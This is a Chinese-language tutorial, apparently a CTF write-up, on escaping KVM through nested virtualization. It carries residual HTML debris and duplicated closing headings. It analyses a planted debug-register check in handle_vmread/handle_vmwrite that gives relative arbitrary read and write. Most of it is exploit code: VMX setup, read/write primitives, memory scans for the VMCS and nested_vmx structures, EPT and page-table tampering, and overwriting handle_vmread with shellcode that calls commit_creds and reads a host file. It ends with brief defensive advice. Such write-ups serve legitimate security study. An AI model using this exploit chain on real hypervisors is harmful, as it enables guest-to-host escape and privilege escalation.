KVM逃逸与嵌套虚拟化漏洞利用技术详解<\/h1>

1. KVM基础概念<\/h2>

1.1 KVM概述<\/h3>
KVM(Kernel-based Virtual Machine)是一种基于Linux内核的虚拟化技术，允许Linux内核充当虚拟机监控器(VMM)或hypervisor。KVM的主要目的是提供一个统一接口，使用户空间程序能够利用硬件虚拟化特性(如Intel的VMX和AMD的SVM)来创建和管理虚拟机。<\/p>

1.2 KVM实现机制<\/h3>
KVM通过\/dev\/kvm<\/code>字符设备驱动程序实现，提供了一系列ioctl命令用于管理和控制虚拟机状态和行为：<\/p>

KVM_SET_REGS<\/strong>：设置虚拟机寄存器状态<\/li>
KVM API文档<\/strong>：详细说明可用ioctl命令和参数结构<\/li>
<\/ul>
1.3 KVM编译选项<\/h3>

编译到内核中：CONFIG_KVM_INTEL=y<\/code><\/li>
编译为内核模块：CONFIG_KVM_INTEL=m<\/code><\/li>
<\/ul>
1.4 QEMU与KVM结合<\/h3>

使用KVM：--enable-kvm<\/code>参数启动QEMU，利用硬件虚拟化特性<\/li>
不使用KVM：纯软件模拟，性能较低<\/li>
<\/ul>
2. 嵌套虚拟化技术<\/h2>
2.1 VMX指令集<\/h3>
Intel处理器有一组特殊指令专门用于虚拟化，称为VMX(Virtual Machine Extensions)指令：<\/p>

包括VMXON、VMXOFF、VMLAUNCH、VMRESUME、VMREAD、VMWRITE等<\/li>
启用VMXE位后处理器才能识别和执行这些指令<\/li>
<\/ul>
2.2 嵌套虚拟化层级<\/h3>

L0：主机VMM (Hypervisor)<\/li>
L1：第一层虚拟机，运行自己的VMM<\/li>
L2：第二层虚拟机(可选)<\/li>
<\/ul>
2.3 L1执行VMX指令流程<\/h3>

指令拦截：L1尝试执行VMX指令<\/li>
VM Exit到L0：控制权转移到L0 VMM<\/li>
L0 VMM分析：确定VMX指令导致的退出<\/li>
模拟执行：L0模拟指令效果<\/li>
虚拟VMCS操作：操作分配给L1的虚拟VMCS<\/li>
状态更新：更新L1的虚拟状态<\/li>
VM Entry回到L1<\/li>
<\/ol>
2.4 L1创建L2的特殊情况<\/h3>

L1执行VMLAUNCH\/VMRESUME<\/li>
L0拦截并模拟，创建用于L2的新虚拟VMCS<\/li>
实际VM Entry进入L2<\/li>
<\/ol>
3. 漏洞分析<\/h2>
3.1 漏洞位置<\/h3>
在handle_vmread<\/code>和handle_vmwrite<\/code>函数中存在漏洞：<\/p>
\/\/ handle_vmwrite漏洞代码
<\/span><\/span><\/span><\/span>if<\/span> (kvm_get_dr(a1, 0LL<\/span>) ==<\/span> 0x1337BABE<\/span>) {
<\/span><\/span>    dr =<\/span> kvm_get_dr(a1, 1LL<\/span>);
<\/span><\/span>    *<\/span>(_QWORD *<\/span>)(v7 +<\/span> 8<\/span> *<\/span> dr) =<\/span> kvm_get_dr(a1, 2LL<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>\/\/ handle_vmread漏洞代码
<\/span><\/span><\/span><\/span>if<\/span> (kvm_get_dr(a1, 0LL<\/span>) ==<\/span> 0x1337BABE<\/span>) {
<\/span><\/span>    dr =<\/span> kvm_get_dr(a1, 1LL<\/span>);
<\/span><\/span>    kvm_set_dr(a1, 2LL<\/span>, *<\/span>(_QWORD *<\/span>)(v6 +<\/span> 8<\/span> *<\/span> dr));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.2 漏洞原理<\/h3>
当kvm_get_dr(a1, 0LL)<\/code>返回0x1337BABE<\/code>时：<\/p>

handle_vmwrite<\/code>：将db[2]<\/code>写入struct vmcs12 + 8*db[1]<\/code><\/li>
handle_vmread<\/code>：将struct vmcs12 + 8*db[1]<\/code>读入db[2]<\/code><\/li>
<\/ul>
这导致可以相对struct vmcs12 *<\/code>的任意地址读写，而vmcs12<\/code>指向虚拟机分配的VMCS在主机上的地址。<\/p>
4. 漏洞利用步骤<\/h2>
4.1 VMX初始化准备<\/h3>

分配并初始化VMXON Region和VMCS Region：<\/li>
<\/ol>
vmxon_page =<\/span> kmalloc(4096<\/span>, GFP_KERNEL);
<\/span><\/span>memset(vmxon_page, 0<\/span>, 4096<\/span>);
<\/span><\/span>vmcs_page =<\/span> kmalloc(4096<\/span>, GFP_KERNEL);
<\/span><\/span>memset(vmcs_page, 0<\/span>, 4096<\/span>);
<\/span><\/span><\/code><\/pre>
设置vmxon_page和vmcs_page开头信息：<\/li>
<\/ol>
asm<\/span> volatile<\/span>("rdmsr"<\/span> :<\/span> "=a"<\/span>(a), "=d"<\/span>(d) :<\/span> "c"<\/span>(MSR_IA32_VMX_BASIC));
<\/span><\/span>uint64_t<\/span> vmcs_revision =<\/span> a |<\/span> ((uint64_t<\/span>)d <<<\/span> 32<\/span>);
<\/span><\/span>*<\/span>(uint64_t<\/span>*<\/span>)(vmxon_page) =<\/span> vmcs_revision;
<\/span><\/span>*<\/span>(uint64_t<\/span>*<\/span>)(vmcs_page) =<\/span> vmcs_revision;
<\/span><\/span><\/code><\/pre>
启动VMX模式：<\/li>
<\/ol>
asm<\/span> volatile<\/span>("movq %cr4, %rax<\/span>\n\t<\/span>"<\/span>
<\/span><\/span>             "bts $13, %rax<\/span>\n\t<\/span>"<\/span>
<\/span><\/span>             "movq %rax, %cr4"<\/span>);
<\/span><\/span><\/code><\/pre>
执行vmxon和vmptrld指令：<\/li>
<\/ol>
asm<\/span> volatile<\/span>("vmxon %[pa]<\/span>\n\t<\/span>"<\/span> "setna %[ret]"<\/span>
<\/span><\/span>             :<\/span> [ret] "=rm"<\/span>(vmxonret)
<\/span><\/span>             :<\/span> [pa] "m"<\/span>(vmxon_page_pa)
<\/span><\/span>             :<\/span> "cc"<\/span>, "memory"<\/span>);
<\/span><\/span><\/code><\/pre>4.2 实现任意地址读写<\/h3>

任意读实现：<\/li>
<\/ol>
static<\/span> size_t read_relative<\/span>(size_t offset_to_nest_vmcs) {
<\/span><\/span>    size_t value;
<\/span><\/span>    size_t magic =<\/span> 0x1337BABE<\/span>;
<\/span><\/span>    asm<\/span>("movq %0, %%db0"<\/span> ::<\/span> "r"<\/span>(magic));
<\/span><\/span>    asm<\/span>("movq %0, %%db1"<\/span> ::<\/span> "r"<\/span>(offset_to_nest_vmcs));
<\/span><\/span>    asm<\/span> volatile<\/span>("vmread %1, %0<\/span>\n\t<\/span>"<\/span> :<\/span> "=r"<\/span>(vmcs_field_value) :<\/span> "r"<\/span>(vmcs_field));
<\/span><\/span>    asm<\/span>("movq %%db2, %0"<\/span> :<\/span> "=r"<\/span>(value));
<\/span><\/span>    return<\/span> value;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
任意写实现：<\/li>
<\/ol>
static<\/span> void<\/span> write_relative<\/span>(size_t offset_to_nest_vmcs, size_t value) {
<\/span><\/span>    size_t magic =<\/span> 0x1337BABE<\/span>;
<\/span><\/span>    asm<\/span>("movq %0, %%db0"<\/span> ::<\/span> "r"<\/span>(magic));
<\/span><\/span>    asm<\/span>("movq %0, %%db1"<\/span> ::<\/span> "r"<\/span>(offset_to_nest_vmcs));
<\/span><\/span>    asm<\/span>("movq %0, %%db2"<\/span> ::<\/span> "r"<\/span>(value));
<\/span><\/span>    asm<\/span> volatile<\/span>("vmwrite %1, %0<\/span>\n\t<\/span>"<\/span> :<\/span> "=r"<\/span>(vmcs_field_value) :<\/span> "r"<\/span>(vmcs_field));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.3 寻找虚拟机VMCS偏移<\/h3>
通过扫描内存查找guest_idtr_base<\/code>字段(偏移0x208处)：<\/p>
for<\/span> (i =<\/span> 0<\/span>; i <<\/span> 0x4000<\/span>; i++<\/span>) {
<\/span><\/span>    pos_offset =<\/span> ((i *<\/span> 0x1000<\/span>) +<\/span> 0x208<\/span>) \/<\/span> 8<\/span>;
<\/span><\/span>    pos_val =<\/span> read_relative(pos_offset);
<\/span><\/span>    if<\/span> (pos_val ==<\/span> 0xfffffe0000000000<\/span>) {
<\/span><\/span>        found_offset =<\/span> pos_offset;
<\/span><\/span>        break<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.4 寻找nested_vmx结构<\/h3>
扫描内存查找包含已知VMXON区域和VMCS物理地址的位置：<\/p>
for<\/span> (i =<\/span> 1<\/span>; i <<\/span> (0x4000<\/span> *<\/span> 0x200<\/span>); i +=<\/span> 2<\/span>) {
<\/span><\/span>    pos_offset =<\/span> i;
<\/span><\/span>    if<\/span> (read_relative(pos_offset)==<\/span> vmcs_page_pa &&<\/span> 
<\/span><\/span>        read_relative(pos_offset-<\/span>2<\/span>) ==<\/span> vmxon_page_pa) {
<\/span><\/span>        found_offset =<\/span> pos_offset;
<\/span><\/span>        break<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4.5 获取EPT表<\/h3>

从虚拟机VMCS获取EPTP：<\/li>
<\/ol>
eptp_value =<\/span> read_relative(l1_vmcs_offset -<\/span>50<\/span>);
<\/span><\/span>ept_addr =<\/span> physbase +<\/span> (eptp_value &<\/span> ~<\/span>0xfffull<\/span>);
<\/span><\/span><\/code><\/pre>
修改EPT表项：<\/li>
<\/ol>
write_relative(third_offset +<\/span> 6<\/span>, 0x87<\/span>);
<\/span><\/span><\/code><\/pre>4.6 修改虚拟机页表<\/h3>

获取CR3寄存器值：<\/li>
<\/ol>
cr3 =<\/span> read_cr3();
<\/span><\/span><\/code><\/pre>
修改页表项：<\/li>
<\/ol>
four =<\/span> (cr3 &<\/span> ~<\/span>0xfffull<\/span>) +<\/span> page_offset_base;
<\/span><\/span>third_page =<\/span> kzalloc(0x1000<\/span>, GFP_KERNEL);
<\/span><\/span>third =<\/span> virt_to_phys(third_page);
<\/span><\/span>four[272<\/span>] =<\/span> third |<\/span> 0x7<\/span>;
<\/span><\/span>third[0<\/span>] =<\/span> 0x180000000<\/span> |<\/span> 0x87<\/span>;
<\/span><\/span><\/code><\/pre>4.7 覆盖关键函数<\/h3>

查找handle_vmread函数：<\/li>
<\/ol>
for<\/span> (i =<\/span> 0<\/span>; i <<\/span> (1<\/span> <<<\/span> 18<\/span>); i +=<\/span> 0x1000<\/span>) {
<\/span><\/span>    val =<\/span> *<\/span>((unsigned<\/span> long<\/span> long<\/span>*<\/span>)(0xffff880000000503<\/span> +<\/span> i));
<\/span><\/span>    if<\/span> (val ==<\/span> 0x1C70BF440F4C<\/span>) {
<\/span><\/span>        handle_vmread_page =<\/span> 0xffff880000000000<\/span> +<\/span> i;
<\/span><\/span>        break<\/span>;
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
覆盖函数代码：<\/li>
<\/ol>
memset(handle_vmread, 0x90<\/span>, 0x281<\/span>);
<\/span><\/span>handle_vmread[0x286<\/span>] =<\/span> 0xc3<\/span>;
<\/span><\/span>memcpy(handle_vmread, shellcode, sizeof<\/span>(shellcode)-<\/span>1<\/span>);
<\/span><\/span><\/code><\/pre>5. Shellcode设计<\/h2>
push<\/span> rax<\/span>
<\/span><\/span>push<\/span> rbx<\/span>
<\/span><\/span>; 保存寄存器状态
<\/span><\/span><\/span><\/span>
<\/span><\/span>; 获取kaslr基址
<\/span><\/span><\/span><\/span>mov<\/span> rax<\/span>, 0xfffffe0000000004<\/span>
<\/span><\/span>mov<\/span> rax<\/span>, [rax<\/span>]
<\/span><\/span>sub<\/span> rax<\/span>, 0x1008e00<\/span>
<\/span><\/span>mov<\/span> r12<\/span>, rax<\/span>
<\/span><\/span>
<\/span><\/span>; 调用commit_creds(init_cred)
<\/span><\/span><\/span><\/span>mov<\/span> r13<\/span>, r12<\/span>
<\/span><\/span>add<\/span> r13<\/span>, 0xbdad0<\/span>
<\/span><\/span>mov<\/span> r14<\/span>, r12<\/span>
<\/span><\/span>add<\/span> r14<\/span>, 0x1a52ca0<\/span>
<\/span><\/span>mov<\/span> rdi<\/span>, r14<\/span>
<\/span><\/span>call<\/span> r13<\/span>
<\/span><\/span>
<\/span><\/span>; 调用filp_open打开文件
<\/span><\/span><\/span><\/span>mov<\/span> r11<\/span>, r12<\/span>
<\/span><\/span>add<\/span> r11<\/span>, 0x292420<\/span>
<\/span><\/span>mov<\/span> rax<\/span>, 0x7478742e6761<\/span>  ; "ag.txt"
<\/span><\/span><\/span><\/span>push<\/span> rax<\/span>
<\/span><\/span>mov<\/span> rax<\/span>, 0x6c662f746f6f722f<\/span>  ; "\/root\/fl"
<\/span><\/span><\/span><\/span>push<\/span> rax<\/span>
<\/span><\/span>mov<\/span> rdi<\/span>, rsp<\/span>
<\/span><\/span>mov<\/span> rsi<\/span>, 0<\/span>
<\/span><\/span>call<\/span> r11<\/span>
<\/span><\/span>
<\/span><\/span>; 调用kernel_read读取文件
<\/span><\/span><\/span><\/span>mov<\/span> r11<\/span>, r12<\/span>
<\/span><\/span>add<\/span> r11<\/span>, 0x294c70<\/span>
<\/span><\/span>mov<\/span> r9<\/span>, r12<\/span>
<\/span><\/span>add<\/span> r9<\/span>, 0x18ab000<\/span>
<\/span><\/span>mov<\/span> rdi<\/span>, r10<\/span>
<\/span><\/span>mov<\/span> rsi<\/span>, r9<\/span>
<\/span><\/span>mov<\/span> rdx<\/span>, 0x100<\/span>
<\/span><\/span>mov<\/span> rcx<\/span>, 0<\/span>
<\/span><\/span>call<\/span> r11<\/span>
<\/span><\/span>
<\/span><\/span>pop<\/span> rax<\/span>
<\/span><\/span>pop<\/span> rax<\/span>
<\/span><\/span>; 恢复寄存器状态
<\/span><\/span><\/span><\/code><\/pre>6. 总结与防御<\/h2>
6.1 漏洞利用总结<\/h3>

通过VMX指令触发漏洞实现任意地址读写<\/li>
利用内存扫描定位关键数据结构<\/li>
修改EPT和页表实现内存映射<\/li>
覆盖关键函数执行shellcode<\/li>
<\/ol>
6.2 防御建议<\/h3>

加强VMX指令的权限检查<\/li>
对DR寄存器的使用进行严格验证<\/li>
实施更严格的嵌套虚拟化隔离机制<\/li>
定期更新KVM和内核版本<\/li>
<\/ol>
6.3 关键点回顾<\/h3>

漏洞根源在于DR寄存器检查不严<\/li>
利用相对地址读写突破隔离<\/li>
通过修改内存映射实现逃逸<\/li>
Shellcode需要精心设计以避免破坏虚拟机状态<\/li>
<\/ul>
KVM逃逸与嵌套虚拟化漏洞利用技术详解<\/h1>

1. KVM基础概念<\/h2>

2. 嵌套虚拟化技术<\/h2>

3. 漏洞分析<\/h2>

6. 总结与防御<\/h2>

6.3 关键点回顾<\/h3> 漏洞根源在于DR寄存器检查不严<\/li> 利用相对地址读写突破隔离<\/li> 通过修改内存映射实现逃逸<\/li> Shellcode需要精心设计以避免破坏虚拟机状态<\/li> <\/ul>

6.3 关键点回顾<\/h3>

漏洞根源在于DR寄存器检查不严<\/li>
利用相对地址读写突破隔离<\/li>
通过修改内存映射实现逃逸<\/li>
Shellcode需要精心设计以避免破坏虚拟机状态<\/li> <\/ul>
